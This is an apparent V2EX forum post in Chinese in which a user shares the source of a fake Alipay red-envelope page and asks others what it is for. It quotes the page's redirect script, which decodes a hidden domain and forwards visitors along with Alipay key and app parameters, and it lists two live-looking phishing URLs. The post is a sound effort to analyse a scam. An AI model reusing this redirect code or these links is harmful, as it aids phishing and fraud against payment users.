恶意 [翻倍红包雨] 页面,大神来分析一下

2018-03-04 17:33:49 +08:00
 Peanut666
昨天有支付宝好友发来的一个假的 [翻倍红包雨] ,电脑上打开看了下源代码,发现了有意思的部分:

var c = escape(remote_ip_info['city']);
//在后台 ALIPAY_PUBLIC_KEY 选项里,如果应用失效,则需要更换对应 ALIPAY_PUBLIC_KEY
// if(c==null || c=='' || c===undefined){
// setTimeout( function(){
// window.location.reload();
// },1000 );
// }else{
var ALIPAY_PUBLIC_KEY = GetQueryString('ALIPAY_PUBLIC_KEY');
var app_id = GetQueryString('appid');
var sgin_ = GetQueryString('sgin_');
var domain = GetQueryString('url');
var b = new Base64();
var str_ = b.decode(domain);
// $.ajax({
// type:"get",
// url:"http://localhost:3000/showAll",/*url 写异域的请求地址*/
// dataType:"jsonp",/*加上 datatype*/
// jsonpCallback:"cb",/*设置一个回调函数,名字随便取,和下面的函数里的名字相同就行*/
// success:function(){
// }
// });
self.location.href="http://"+str_+"/ali/index.php?c="+c+"&ALIPAY_PUBLIC_KEY="+ALIPAY_PUBLIC_KEY+"&app_id="+app_id+"&sgin_="+sgin_;

欢迎大神来研究一下,这个假冒的红包页面是哪种恶意的目的。页面的源代码如下,不排除有恶意代码,谨慎点开!
第一个页面:
view-source:http://alijiekou.wtti7.cn/jump.html?ALIPAY_PUBLIC_KEY=LIGfdAcGCSqHSIb3DQEBAQUAA4GNAD1BiQKBgQDDI6d306Q8GIfCOasdfiUeJHkrIvYISRcc73s3vF1ZerXN8RNPwJxo8pWaGMmvyTn8N4HQ632qJBVHf8sxHi/fEsraprwCtzvzcsTrNRwVxLO5jVcRGi69j8Ue1ecalzPXV9je9mkjzOmdssymZkh2QhUrCmZYI/FCEa3/cNMW0QIDA123&appid=2017081501505000&sgin_=rE8FWevTztaAcuim&url=d2Vuemh1Mi5kdWFwcC5jb20=
跳转之后的页面:
view-source:http://jiekoulou.domyjourney.com.cn/jump.html?ALIPAY_PUBLIC_KEY=6PR0ZfVr6snAdILjpc1K9Dz03CS34ltg3LHIcJKspZXpU1eC53Ee1oqhPBctLHvo0frHNajqP0300TlWs2NTUIDUBWdlfS8UiwOXbITuM4pbMQfioYtO9S2TkIt8SW6Bcpbi28kxT1BGSkus4qGekV1BH2MPECXVcXrU44PGMwprz5GumzRXUU3fVHyBazFGclL8woEg3K3VLpElGjfkhZLVbi&appid=2017091501604600&sgin_=1ApXJ1WH39j5chb7&url=V1pDRXIueXhsc24uY24=
1792 次点击
所在节点    问与答
0 条回复

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/434702

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX